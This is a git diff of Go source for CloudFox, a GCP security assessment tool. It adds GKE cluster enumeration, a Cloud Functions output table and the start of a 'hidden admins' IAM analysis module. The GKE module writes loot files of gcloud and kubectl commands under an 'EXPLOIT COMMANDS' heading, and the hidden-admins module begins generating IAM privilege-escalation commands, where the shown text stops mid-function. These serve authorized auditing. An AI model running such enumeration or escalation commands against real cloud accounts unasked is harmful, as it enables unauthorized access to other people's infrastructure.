"@appspot.gserviceaccount.com") || + strings.Contains(serviceAccount, "-compute@developer.gserviceaccount.com") { + defaultSA = "Yes" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if serviceAccount != "-" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, serviceAccount) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" + } + + // Format ingress for display (consistent with Cloud Run) + ingress := formatFunctionIngress(fn.IngressSettings) + + // If function has IAM bindings, create one row per binding (shows IAM Binding Role/Principal) + if len(fn.IAMBindings) > 0 { + for _, binding := range fn.IAMBindings { + body = append(body, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + fn.Runtime, + state, + triggerInfo, + url, + ingress, + shared.BoolToYesNo(fn.IsPublic), + serviceAccount, + attackPaths, + defaultSA, + vpcAccess, + binding.Role, + binding.Member, + }) + } + } else { + // Function has no IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + fn.Runtime, + state, + triggerInfo, + url, + ingress, + shared.BoolToYesNo(fn.IsPublic), + serviceAccount, + attackPaths, + defaultSA, + vpcAccess, + "-", + "-", + }) + } + } + return body +} + +// formatFunctionIngress formats ingress settings for display (consistent with Cloud Run) +func formatFunctionIngress(ingress string) string { + switch ingress { + case "ALLOW_ALL": + return "ALL (Public)" + case "ALLOW_INTERNAL_ONLY": + return "INTERNAL" + case "ALLOW_INTERNAL_AND_GCLB": + return "INT+LB" + default: + return ingress + } +} + +// extractFunctionName extracts just the name from a resource path +func extractFunctionName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/commands/gke.go 
b/gcp/commands/gke.go new file mode 100755 index 00000000..5c0aea3a --- /dev/null +++ b/gcp/commands/gke.go @@ -0,0 +1,482 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/gcp/shared" + + GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPGKECommand = &cobra.Command{ + Use: globals.GCP_GKE_MODULE_NAME, + Aliases: []string{"kubernetes", "k8s", "clusters"}, + Short: "Enumerate GKE clusters with security analysis", + Long: `Enumerate GKE clusters across projects with comprehensive security analysis. + +Features: +- Lists all GKE clusters accessible to the authenticated user +- Analyzes security configuration (private clusters, authorized networks, RBAC) +- Identifies clusters with public API endpoints +- Shows workload identity configuration +- Detects common misconfigurations (legacy ABAC, basic auth, no network policy) +- Enumerates node pools with service accounts and OAuth scopes +- Shows Binary Authorization status +- Shows GKE Autopilot vs Standard mode +- Shows Config Connector and Istio/ASM status +- Shows maintenance window and exclusions +- Generates kubectl and gcloud commands for further analysis + +Security Columns: +- Private: Whether the cluster uses private nodes (no public IPs) +- MasterAuth: Master authorized networks enabled +- NetworkPolicy: Kubernetes network policy controller enabled +- WorkloadIdentity: GKE Workload Identity configured +- ShieldedNodes: Shielded GKE nodes enabled +- BinAuth: Binary Authorization enabled +- Autopilot: GKE Autopilot mode (vs Standard) +- Issues: Detected security misconfigurations + +Attack Surface: +- Public API servers are accessible from the internet +- Clusters without Workload Identity use node service accounts +- Default service accounts may have 
excessive permissions +- Legacy ABAC allows broader access than RBAC +- Autopilot clusters have reduced attack surface +- Binary Authorization prevents untrusted container images + +TIP: Run 'workload-identity' to enumerate K8s SA -> GCP SA bindings and Workload Identity Federation (external identity pools/providers).`, + Run: runGCPGKECommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type GKEModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectClusters map[string][]GKEService.ClusterInfo // projectID -> clusters + ProjectNodePools map[string][]GKEService.NodePoolInfo // projectID -> node pools + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type GKEOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o GKEOutput) TableFiles() []internal.TableFile { return o.Table } +func (o GKEOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPGKECommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_GKE_MODULE_NAME) + if err != nil { + return + } + + module := &GKEModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectClusters: make(map[string][]GKEService.ClusterInfo), + ProjectNodePools: make(map[string][]GKEService.NodePoolInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *GKEModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get 
FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_GKE_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_GKE_MODULE_NAME, m.processProject) + + // Get all clusters for stats + allClusters := m.getAllClusters() + allNodePools := m.getAllNodePools() + if len(allClusters) == 0 { + logger.InfoM("No GKE clusters found", globals.GCP_GKE_MODULE_NAME) + return + } + + // Count public clusters + publicCount := 0 + for _, cluster := range allClusters { + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + publicCount++ + } + } + + msg := fmt.Sprintf("Found %d cluster(s), %d node pool(s)", len(allClusters), len(allNodePools)) + if publicCount > 0 { + msg += fmt.Sprintf(" [%d with public API endpoint]", publicCount) + } + logger.SuccessM(msg, globals.GCP_GKE_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllClusters returns all clusters from all projects (for statistics) +func (m *GKEModule) getAllClusters() []GKEService.ClusterInfo { + var all []GKEService.ClusterInfo + for _, clusters := range m.ProjectClusters { + all = append(all, clusters...) + } + return all +} + +// getAllNodePools returns all node pools from all projects (for statistics) +func (m *GKEModule) getAllNodePools() []GKEService.NodePoolInfo { + var all []GKEService.NodePoolInfo + for _, nodePools := range m.ProjectNodePools { + all = append(all, nodePools...) 
+ } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *GKEModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating GKE clusters in project: %s", projectID), globals.GCP_GKE_MODULE_NAME) + } + + gs := GKEService.New() + clusters, nodePools, err := gs.Clusters(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_GKE_MODULE_NAME, + fmt.Sprintf("Could not enumerate GKE clusters in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectClusters[projectID] = clusters + m.ProjectNodePools[projectID] = nodePools + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["gke-commands"] = &internal.LootFile{ + Name: "gke-commands", + Contents: "# GKE Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, cluster := range clusters { + m.addClusterToLoot(projectID, cluster) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d cluster(s) in project %s", len(clusters), projectID), globals.GCP_GKE_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *GKEModule) addClusterToLoot(projectID string, cluster GKEService.ClusterInfo) { + lootFile := m.LootMap[projectID]["gke-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CLUSTER: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n\n"+ + "# === ENUMERATION 
COMMANDS ===\n\n"+ + "# Get detailed cluster configuration and settings\n"+ + "gcloud container clusters describe %s --location=%s --project=%s\n\n"+ + "# Configure kubectl to authenticate to this cluster\n"+ + "gcloud container clusters get-credentials %s --location=%s --project=%s\n\n"+ + "# List all node pools in this cluster\n"+ + "gcloud container node-pools list --cluster=%s --location=%s --project=%s\n\n"+ + "# kubectl commands (after getting credentials):\n\n"+ + "# Show cluster endpoint and services info\n"+ + "kubectl cluster-info\n\n"+ + "# List all nodes with additional details (IP, OS, runtime)\n"+ + "kubectl get nodes -o wide\n\n"+ + "# List all namespaces in the cluster\n"+ + "kubectl get namespaces\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Check what actions you can perform in the cluster\n"+ + "kubectl auth can-i --list\n\n", + cluster.Name, + cluster.ProjectID, cluster.Location, + cluster.Name, cluster.Location, cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *GKEModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectClusters { + projectsWithData[projectID] = true + } + + // Build 
project-level outputs + for projectID := range projectsWithData { + clusters := m.ProjectClusters[projectID] + nodePools := m.ProjectNodePools[projectID] + + tables := m.buildTablesForProject(clusters, nodePools) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = GKEOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_GKE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *GKEModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allClusters := m.getAllClusters() + allNodePools := m.getAllNodePools() + + tables := m.buildTablesForProject(allClusters, allNodePools) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := GKEOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + 
m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_GKE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds all tables for given clusters and node pools +func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nodePools []GKEService.NodePoolInfo) []internal.TableFile { + tableFiles := []internal.TableFile{} + + // Clusters table - columns grouped by: identity, network/access, cluster-level security + clusterHeader := []string{ + "Project", "Name", "Location", "Mode", "Status", "Version", "Release Channel", + "Endpoint", "Private", "Authorized CIDRs", + "WorkloadID", "NetPolicy", "BinAuth", + } + + var clusterBody [][]string + for _, cluster := range clusters { + clusterMode := "Standard" + if cluster.Autopilot { + clusterMode = "Autopilot" + } + releaseChannel := cluster.ReleaseChannel + if releaseChannel == "" || releaseChannel == "UNSPECIFIED" { + releaseChannel = "-" + } + endpoint := cluster.Endpoint + if endpoint == "" { + endpoint = "-" + } + + // Format authorized CIDRs + authorizedCIDRs := formatAuthorizedCIDRs(cluster) + + clusterBody = append(clusterBody, []string{ + m.GetProjectName(cluster.ProjectID), cluster.Name, cluster.Location, + clusterMode, cluster.Status, cluster.CurrentMasterVersion, releaseChannel, + endpoint, shared.BoolToYesNo(cluster.PrivateCluster), authorizedCIDRs, + shared.BoolToYesNo(cluster.WorkloadIdentity != ""), shared.BoolToYesNo(cluster.NetworkPolicy), + shared.BoolToYesNo(cluster.BinaryAuthorization), + }) + } + + if len(clusterBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-clusters", + Header: clusterHeader, + Body: clusterBody, + }) + } + + // Node pools table - node-level details including hardware security (like instances module) + nodePoolHeader := []string{ + "Project", "Cluster", "Node Pool", "Machine Type", "Node 
Count", + "Auto Upgrade", "Secure Boot", "Integrity", "Preemptible", + "Service Account", "SA Attack Paths", "SA Scopes", "SA Scope Summary", + } + + var nodePoolBody [][]string + for _, np := range nodePools { + saDisplay := np.ServiceAccount + if saDisplay == "" { + saDisplay = "-" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if saDisplay != "-" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, saDisplay) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" + } + + // Format actual scopes for display + scopes := formatGKEScopes(np.OAuthScopes) + + // Get scope summary, default to "Unknown" if empty + scopeSummary := np.ScopeSummary + if scopeSummary == "" { + scopeSummary = "Unknown" + } + + nodePoolBody = append(nodePoolBody, []string{ + m.GetProjectName(np.ProjectID), np.ClusterName, np.Name, + np.MachineType, fmt.Sprintf("%d", np.NodeCount), + shared.BoolToYesNo(np.AutoUpgrade), + shared.BoolToYesNo(np.SecureBoot), shared.BoolToYesNo(np.IntegrityMonitoring), + shared.BoolToYesNo(np.Preemptible || np.Spot), + saDisplay, attackPaths, scopes, scopeSummary, + }) + } + + if len(nodePoolBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-node-pools", + Header: nodePoolHeader, + Body: nodePoolBody, + }) + } + + return tableFiles +} + +// formatAuthorizedCIDRs formats the authorized CIDRs for display +func formatAuthorizedCIDRs(cluster GKEService.ClusterInfo) string { + if cluster.PrivateCluster { + return "Private endpoint" + } + if !cluster.MasterAuthorizedOnly { + return "0.0.0.0/0 (any)" + } + if len(cluster.MasterAuthorizedCIDRs) == 0 { + return "None configured" + } + // Check if 0.0.0.0/0 is in the list (effectively public) + for _, cidr := range cluster.MasterAuthorizedCIDRs { + if cidr == "0.0.0.0/0" { + return "0.0.0.0/0 (any)" + } + } + // Show all CIDRs + return 
strings.Join(cluster.MasterAuthorizedCIDRs, ", ") +} + +// formatGKEScopes formats OAuth scopes for display (extracts short names from URLs) +func formatGKEScopes(scopes []string) string { + if len(scopes) == 0 { + return "-" + } + + var shortScopes []string + for _, scope := range scopes { + // Extract the scope name from the URL + // e.g., "https://www.googleapis.com/auth/cloud-platform" -> "cloud-platform" + parts := strings.Split(scope, "/") + if len(parts) > 0 { + shortScopes = append(shortScopes, parts[len(parts)-1]) + } + } + return strings.Join(shortScopes, ", ") +} diff --git a/gcp/commands/hiddenadmins.go b/gcp/commands/hiddenadmins.go new file mode 100755 index 00000000..ea340048 --- /dev/null +++ b/gcp/commands/hiddenadmins.go @@ -0,0 +1,966 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + iampb "cloud.google.com/go/iam/apiv1/iampb" + resourcemanager "cloud.google.com/go/resourcemanager/apiv3" + resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + crmv1 "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iam/v1" + "google.golang.org/api/iterator" +) + +var GCPHiddenAdminsCommand = &cobra.Command{ + Use: globals.GCP_HIDDEN_ADMINS_MODULE_NAME, + Aliases: []string{"ha", "hidden"}, + Short: "Identify principals who can modify IAM policies (hidden admins)", + Long: `Analyze GCP IAM policies to identify principals who can modify IAM bindings. + +This module finds "hidden admins" - principals who may not have obvious admin roles +but possess permissions to grant themselves or others elevated access. 
+ +Detected IAM modification capabilities: + +Organization Level: +- resourcemanager.organizations.setIamPolicy - Modify org-wide IAM +- iam.roles.create/update at org level - Create/modify org custom roles + +Folder Level: +- resourcemanager.folders.setIamPolicy - Modify folder IAM (affects all children) + +Project Level: +- resourcemanager.projects.setIamPolicy - Modify project IAM +- iam.roles.create/update - Create/modify project custom roles + +Service Account Level: +- iam.serviceAccounts.setIamPolicy - Grant SA access to others +- iam.serviceAccounts.create + setIamPolicy combo + +Resource Level IAM: +- storage.buckets.setIamPolicy - Modify bucket IAM +- bigquery.datasets.setIamPolicy - Modify dataset IAM +- pubsub.topics/subscriptions.setIamPolicy - Modify Pub/Sub IAM +- secretmanager.secrets.setIamPolicy - Modify secret IAM +- compute.instances.setIamPolicy - Modify instance IAM +- cloudfunctions.functions.setIamPolicy - Modify function IAM +- run.services.setIamPolicy - Modify Cloud Run IAM +- artifactregistry.repositories.setIamPolicy - Modify registry IAM`, + Run: runGCPHiddenAdminsCommand, +} + +// IAMModificationPermission represents a permission that allows IAM policy modification +type IAMModificationPermission struct { + Permission string + Category string + Description string +} + +// HiddenAdmin represents a principal with IAM modification capabilities +type HiddenAdmin struct { + Principal string + PrincipalType string + Permission string + Category string + Description string + ScopeType string // organization, folder, project, resource + ScopeID string + ScopeName string + ExploitCommand string +} + +type HiddenAdminsModule struct { + gcpinternal.BaseGCPModule + + AllAdmins []HiddenAdmin + OrgAdmins []HiddenAdmin + FolderAdmins []HiddenAdmin + ProjectAdmins map[string][]HiddenAdmin // projectID -> admins + ResourceAdmins []HiddenAdmin + + // FoxMapper-based wrong admins + WrongAdmins []foxmapperservice.WrongAdminFinding + FoxMapperCache 
*gcpinternal.FoxMapperCache + + // OrgCache for ancestry lookups + OrgCache *gcpinternal.OrgCache + + OrgIDs []string + OrgNames map[string]string + FolderNames map[string]string + + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type HiddenAdminsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o HiddenAdminsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o HiddenAdminsOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPHiddenAdminsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + if err != nil { + return + } + + module := &HiddenAdminsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + AllAdmins: []HiddenAdmin{}, + OrgAdmins: []HiddenAdmin{}, + FolderAdmins: []HiddenAdmin{}, + ProjectAdmins: make(map[string][]HiddenAdmin), + ResourceAdmins: []HiddenAdmin{}, + OrgIDs: []string{}, + OrgNames: make(map[string]string), + FolderNames: make(map[string]string), + LootMap: make(map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// GetIAMModificationPermissions returns permissions that allow IAM policy modification +func GetIAMModificationPermissions() []IAMModificationPermission { + return []IAMModificationPermission{ + // Organization-level IAM + {Permission: "resourcemanager.organizations.setIamPolicy", Category: "Org IAM", Description: "Modify organization-wide IAM policy"}, + + // Folder-level IAM + {Permission: "resourcemanager.folders.setIamPolicy", Category: "Folder IAM", Description: "Modify folder IAM policy (affects all children)"}, + + // Project-level IAM + {Permission: "resourcemanager.projects.setIamPolicy", Category: "Project IAM", Description: "Modify project IAM policy"}, + + // Custom Role Management + {Permission: "iam.roles.create", Category: "Custom Roles", Description: "Create custom IAM roles"}, + {Permission: 
"iam.roles.update", Category: "Custom Roles", Description: "Modify custom IAM role permissions"}, + + // Service Account IAM + {Permission: "iam.serviceAccounts.setIamPolicy", Category: "SA IAM", Description: "Grant access to service accounts"}, + + // Org Policy (can disable security constraints) + {Permission: "orgpolicy.policy.set", Category: "Org Policy", Description: "Modify organization policies"}, + + // Resource-specific IAM + {Permission: "storage.buckets.setIamPolicy", Category: "Storage IAM", Description: "Modify bucket IAM policy"}, + {Permission: "bigquery.datasets.setIamPolicy", Category: "BigQuery IAM", Description: "Modify dataset IAM policy"}, + {Permission: "pubsub.topics.setIamPolicy", Category: "Pub/Sub IAM", Description: "Modify topic IAM policy"}, + {Permission: "pubsub.subscriptions.setIamPolicy", Category: "Pub/Sub IAM", Description: "Modify subscription IAM policy"}, + {Permission: "secretmanager.secrets.setIamPolicy", Category: "Secrets IAM", Description: "Modify secret IAM policy"}, + {Permission: "compute.instances.setIamPolicy", Category: "Compute IAM", Description: "Modify instance IAM policy"}, + {Permission: "compute.images.setIamPolicy", Category: "Compute IAM", Description: "Modify image IAM policy"}, + {Permission: "compute.snapshots.setIamPolicy", Category: "Compute IAM", Description: "Modify snapshot IAM policy"}, + {Permission: "cloudfunctions.functions.setIamPolicy", Category: "Functions IAM", Description: "Modify function IAM policy"}, + {Permission: "run.services.setIamPolicy", Category: "Cloud Run IAM", Description: "Modify Cloud Run service IAM policy"}, + {Permission: "artifactregistry.repositories.setIamPolicy", Category: "Artifact Registry IAM", Description: "Modify repository IAM policy"}, + {Permission: "cloudkms.cryptoKeys.setIamPolicy", Category: "KMS IAM", Description: "Modify KMS key IAM policy"}, + } +} + +func (m *HiddenAdminsModule) Execute(ctx context.Context, logger internal.Logger) { + 
logger.InfoM("Analyzing IAM policies to identify hidden admins...", globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + + // Load OrgCache for ancestry lookups (needed for per-project filtering) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + + // Try to load FoxMapper data for wrongadmin analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) + } + + // Use FoxMapper wrongadmin analysis if available + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + svc := m.FoxMapperCache.GetService() + m.WrongAdmins = svc.AnalyzeWrongAdmins() + if len(m.WrongAdmins) > 0 { + logger.InfoM(fmt.Sprintf("FoxMapper found %d 'wrong admins' (admins without explicit roles/owner)", len(m.WrongAdmins)), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } + } + + // Build permission map + permMap := make(map[string]IAMModificationPermission) + for _, p := range GetIAMModificationPermissions() { + permMap[p.Permission] = p + } + + // Analyze organization-level IAM + m.analyzeOrganizationIAM(ctx, logger, permMap) + + // Analyze folder-level IAM + m.analyzeFolderIAM(ctx, logger, permMap) + + // Analyze project-level IAM for each project + for _, projectID := range m.ProjectIDs { + m.analyzeProjectIAM(ctx, logger, projectID, permMap) + } + + // Generate loot (playbook) + m.generateLoot() + + if len(m.AllAdmins) == 0 && len(m.WrongAdmins) == 0 { + logger.InfoM("No hidden admins found", globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + return + } + + // Count by scope type + orgCount := 
len(m.OrgAdmins) + folderCount := len(m.FolderAdmins) + projectCount := 0 + for _, admins := range m.ProjectAdmins { + projectCount += len(admins) + } + resourceCount := len(m.ResourceAdmins) + + if len(m.AllAdmins) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d hidden admin(s) with IAM modification permissions: %d org-level, %d folder-level, %d project-level, %d resource-level", + len(m.AllAdmins), orgCount, folderCount, projectCount, resourceCount), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } + + if len(m.WrongAdmins) > 0 { + // Count by admin level + orgWrong := 0 + folderWrong := 0 + projectWrong := 0 + for _, wa := range m.WrongAdmins { + switch wa.AdminLevel { + case "org": + orgWrong++ + case "folder": + folderWrong++ + default: + projectWrong++ + } + } + logger.SuccessM(fmt.Sprintf("Found %d 'wrong admins' (FoxMapper): %d org-level, %d folder-level, %d project-level", + len(m.WrongAdmins), orgWrong, folderWrong, projectWrong), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *HiddenAdminsModule) analyzeOrganizationIAM(ctx context.Context, logger internal.Logger, permMap map[string]IAMModificationPermission) { + orgsClient, err := resourcemanager.NewOrganizationsClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, globals.GCP_HIDDEN_ADMINS_MODULE_NAME, "Could not create organizations client") + } + return + } + defer orgsClient.Close() + + // Get IAM service for role resolution + iamService, _ := m.getIAMService(ctx) + + searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} + it := orgsClient.SearchOrganizations(ctx, searchReq) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + orgID := strings.TrimPrefix(org.Name, "organizations/") + m.OrgNames[orgID] = org.DisplayName + m.OrgIDs = append(m.OrgIDs, orgID) + + policy, err := orgsClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + 
Resource: org.Name, + }) + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + permissions := m.getRolePermissions(iamService, binding.Role, "") + for _, member := range binding.Members { + m.checkForHiddenAdmins(member, permissions, permMap, "organization", orgID, org.DisplayName) + } + } + } +} + +func (m *HiddenAdminsModule) analyzeFolderIAM(ctx context.Context, logger internal.Logger, permMap map[string]IAMModificationPermission) { + foldersClient, err := resourcemanager.NewFoldersClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, globals.GCP_HIDDEN_ADMINS_MODULE_NAME, "Could not create folders client") + } + return + } + defer foldersClient.Close() + + iamService, _ := m.getIAMService(ctx) + + searchReq := &resourcemanagerpb.SearchFoldersRequest{} + it := foldersClient.SearchFolders(ctx, searchReq) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + folderID := strings.TrimPrefix(folder.Name, "folders/") + m.FolderNames[folderID] = folder.DisplayName + + policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: folder.Name, + }) + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + permissions := m.getRolePermissions(iamService, binding.Role, "") + for _, member := range binding.Members { + m.checkForHiddenAdmins(member, permissions, permMap, "folder", folderID, folder.DisplayName) + } + } + } +} + +func (m *HiddenAdminsModule) analyzeProjectIAM(ctx context.Context, logger internal.Logger, projectID string, permMap map[string]IAMModificationPermission) { + crmService, err := crmv1.NewService(ctx) + if err != nil { + return + } + + policy, err := crmService.Projects.GetIamPolicy(projectID, &crmv1.GetIamPolicyRequest{}).Do() + if err != nil { + return + } + + iamService, _ := m.getIAMService(ctx) + projectName := m.GetProjectName(projectID) + + 
for _, binding := range policy.Bindings { + if binding == nil { + continue + } + permissions := m.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + m.checkForHiddenAdmins(member, permissions, permMap, "project", projectID, projectName) + } + } +} + +func (m *HiddenAdminsModule) checkForHiddenAdmins(member string, permissions []string, permMap map[string]IAMModificationPermission, scopeType, scopeID, scopeName string) { + if member == "allUsers" || member == "allAuthenticatedUsers" { + return + } + + principalType := extractPrincipalType(member) + principal := extractPrincipalEmail(member) + + for _, perm := range permissions { + if iamPerm, ok := permMap[perm]; ok { + admin := HiddenAdmin{ + Principal: principal, + PrincipalType: principalType, + Permission: perm, + Category: iamPerm.Category, + Description: iamPerm.Description, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + ExploitCommand: m.generateExploitCommand(perm, scopeType, scopeID), + } + + m.mu.Lock() + m.AllAdmins = append(m.AllAdmins, admin) + switch scopeType { + case "organization": + m.OrgAdmins = append(m.OrgAdmins, admin) + case "folder": + m.FolderAdmins = append(m.FolderAdmins, admin) + case "project": + m.ProjectAdmins[scopeID] = append(m.ProjectAdmins[scopeID], admin) + case "resource": + m.ResourceAdmins = append(m.ResourceAdmins, admin) + } + m.mu.Unlock() + } + } +} + +func (m *HiddenAdminsModule) generateExploitCommand(permission, scopeType, scopeID string) string { + switch permission { + case "resourcemanager.organizations.setIamPolicy": + return fmt.Sprintf("gcloud organizations add-iam-policy-binding %s 